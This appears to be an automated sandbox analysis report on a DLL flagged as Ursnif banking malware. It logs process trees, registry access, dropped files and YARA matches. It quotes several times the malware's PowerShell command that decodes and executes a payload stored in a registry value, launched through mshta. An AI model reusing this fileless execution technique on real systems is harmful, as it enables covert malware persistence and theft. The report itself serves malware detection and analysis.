Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\2790000.dll,DllRegisterServer	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\2790000.dll',#1	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17426 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17430 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:82966 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:82970 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:82982 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17460 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17468 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17472 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17480 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:83036 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17500 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:83052 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17514 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17520 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:279558 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:83084 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:83090 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17546 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17468 /prefetch:2	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\rzslcw3n\rzslcw3n.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\rpyoew2f\rpyoew2f.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESD796.tmp' 'c:\Users\user\AppData\Local\Temp\rzslcw3n\CSCA64EAED44D2B4776864E5EDA5D4E8B86.TMP'
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xwrbq4ie\xwrbq4ie.cmdline'
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\pkkmtuzt\pkkmtuzt.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES30B.tmp' 'c:\Users\user\AppData\Local\Temp\rpyoew2f\CSCDF3AABDF3FB34DF1A43A4F7FD45C9671.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES1395.tmp' 'c:\Users\user\AppData\Local\Temp\xwrbq4ie\CSCC07B09CA405E4901BCF4DD90291B57CA.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES1D78.tmp' 'c:\Users\user\AppData\Local\Temp\pkkmtuzt\CSC7DF2BB886B1A41BB8B841DD3834E0B8.TMP'

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Source:	Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000002C.00000002.886760710.0000026782F50000.00000002.00000001.sdmp, csc.exe, 00000036.00000002.914710159.00000138B0E20000.00000002.00000001.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\xwrbq4ie\xwrbq4ie.pdbXP* source: powershell.exe, 0000002F.00000002.962874378.00000251AFDE2000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.889958591.0000000004330000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.942501146.0000000006560000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.889958591.0000000004330000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.942501146.0000000006560000.00000004.00000001.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\xwrbq4ie\xwrbq4ie.pdb source: powershell.exe, 0000002F.00000002.962727249.00000251AFD82000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\xwrbq4ie\xwrbq4ie.pdbl\ModuleAnalysisCache.0.0.0__31bf3856ad364e35\System.Management.Automation.dllmands.Utility.dllt.dll source: powershell.exe, 0000002F.00000002.935651242.00000251AA29E000.00000004.00000020.sdmp

Data Obfuscation:

Suspicious powershell command line found

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))

Compiles C# or VB.Net code

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\rzslcw3n\rzslcw3n.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\rpyoew2f\rpyoew2f.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xwrbq4ie\xwrbq4ie.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\pkkmtuzt\pkkmtuzt.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\rzslcw3n\rzslcw3n.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\rpyoew2f\rpyoew2f.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xwrbq4ie\xwrbq4ie.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\pkkmtuzt\pkkmtuzt.cmdline'

Contains functionality to dynamically determine API calls

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_10001BAC LoadLibraryA,GetProcAddress,

0_2_10001BAC

Registers a DLL

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\2790000.dll

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10002120 push ecx; ret	0_2_10002129
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10002173 push ecx; ret	0_2_10002183
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04642D8B push ecx; ret	3_2_04642D9B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04629670 push ecx; mov dword ptr [esp], 00000002h	3_2_04629671
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_046428A0 push ecx; ret	3_2_046428A9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_04E9ABC0 push ecx; ret	7_2_04E9ABC9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_04E9AF6F push ecx; ret	7_2_04E9AF7F

Persistence and Installation Behavior:

Drops PE files

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\xwrbq4ie\xwrbq4ie.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\rzslcw3n\rzslcw3n.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\rpyoew2f\rpyoew2f.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\pkkmtuzt\pkkmtuzt.dll	Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Source: Yara match	File source: 00000000.00000003.718768044.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792588340.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.910870766.000000000500C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743986098.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754576282.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.886665865.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743884780.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718843741.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.921590323.000002009624C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754698141.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.942431868.0000000006548000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754769459.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.921653707.000002009624C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.866559376.0000000004E6C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.918784964.0000000006548000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887362979.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754654918.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743778425.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792300169.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743828986.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792520115.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718744882.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792349818.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.921759909.000002009624C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.926000939.0000000005D38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.744005054.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.886778931.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718819209.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743935552.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792420602.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792562195.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754876807.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887204962.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718696614.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.886970529.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718647612.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754836366.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.858457272.000000000564C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.921808684.000002009624C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.824971303.0000000001CAC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.744015390.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743688599.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718721890.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887090567.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887042071.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718792278.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754897105.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887180889.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887136487.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792489565.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792387675.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754923089.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.940528675.0000000005D38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6632, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6560, type: MEMORY

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Windows\System32\loaddll32.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
